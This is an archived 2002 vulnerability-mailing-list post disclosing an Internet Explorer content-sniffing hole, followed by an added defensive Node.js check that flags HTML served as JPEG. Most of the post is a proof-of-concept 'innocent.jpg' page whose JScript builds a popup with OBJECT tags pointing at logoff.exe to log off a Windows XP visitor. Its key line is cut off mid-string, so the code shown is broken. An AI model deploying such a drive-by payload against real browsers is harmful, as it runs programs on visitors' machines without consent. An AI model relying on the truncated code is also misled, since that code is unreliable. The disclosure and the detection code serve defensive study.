Vulnerability Development mailing list archives
Rather large MSIE-hole
From: Magnus Bodin <magnus () bodin org>
Date: Tue, 12 Mar 2002 11:32:20 +0100
The latest MSIE-hole is now spreading.

THE ATTACHED HTML-code is served as a jpeg-file, and as MSIE ignores the Content-Type if it "thinks" it knows better, then the code is executed.

This in combination with the malicious code that is possible to run, then an "innocent.jpg" with the following content will log off an XP-user.

--%< cut here-----
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>
var programName=new Array(
    'c:/windows/system32/logoff.exe',
    'c:/winxp/system32/logoff.exe',
    'c:/winnt/system32/logoff.exe'
);
function Init(){
    var oPopup=window.createPopup();
    var oPopBody=oPopup.document.body;
    var n,html='';
    for(n=0;n<programName.length;n++)
        html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' C
    oPopBody.innerHTML=html;
    oPopup.show(290, 390, 200, 200, document.body);
}
</SCRIPT>
</head>
<BODY onload="Init()">
You should feel lucky if you dont have XP right now.
</BODY>
</HTML>
--%< cut here-----

--
magnus
MICROS~1 BOB was written in Lisp.
http://x42.com/
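A server-side check for the mismatch described in the message above, as an added example that is not part of the original post: it flags a file declared as JPEG whose leading bytes are HTML rather than image data. The function names, the 256-byte inspection window and the token list are assumptions, and the sample buffers are constructed.

```javascript
// Added example: flag content declared as JPEG that a content-sniffing
// client could render as HTML instead of as an image.
const JPEG_SOI = [0xff, 0xd8, 0xff]; // bytes every JPEG file starts with
const SNIFF_WINDOW = 256;            // assumption: leading bytes a sniffing client inspects
const HTML_TOKENS = ['<!doctype', '<html', '<head', '<title', '<body', '<script', '<object'];

function hasJpegMagic(buf) {
  return buf.length >= JPEG_SOI.length && JPEG_SOI.every((b, i) => buf[i] === b);
}

function htmlTokensIn(buf) {
  // latin1 maps one byte to one character, so binary data cannot break the decode.
  const head = buf.subarray(0, SNIFF_WINDOW).toString('latin1').toLowerCase();
  return HTML_TOKENS.filter((t) => head.includes(t));
}

// Decide what to do with a file that is about to be stored or served as image/jpeg.
function checkDeclaredJpeg(buf) {
  const tokens = htmlTokensIn(buf);
  const magic = hasJpegMagic(buf);
  if (!magic && tokens.length > 0) return { verdict: 'reject', reason: 'html-as-jpeg', tokens };
  if (!magic) return { verdict: 'reject', reason: 'not-a-jpeg', tokens };
  if (tokens.length > 0) return { verdict: 'review', reason: 'jpeg-with-html-tokens', tokens };
  return { verdict: 'accept', reason: 'jpeg', tokens };
}

// Headers for an accepted file; nosniff only helps with browsers that honour it.
function imageResponseHeaders() {
  return { 'Content-Type': 'image/jpeg', 'X-Content-Type-Options': 'nosniff' };
}

// Constructed samples: HTML renamed to .jpg, a minimal JFIF header, and a JPEG with markup appended.
const htmlAsJpeg = Buffer.from(
  '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">\n<HTML><HEAD><TITLE>t</TITLE>',
  'latin1');
const realJpeg = Buffer.from([0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46, 0x00]);
const polyglot = Buffer.concat([realJpeg, Buffer.from('<script>', 'latin1')]);

for (const [name, buf] of [['innocent.jpg', htmlAsJpeg], ['photo.jpg', realJpeg], ['odd.jpg', polyglot]]) {
  console.log(name, JSON.stringify(checkDeclaredJpeg(buf)));
}
```

Validating the bytes at upload or proxy time covers clients that ignore the declared type, which the response header alone cannot do.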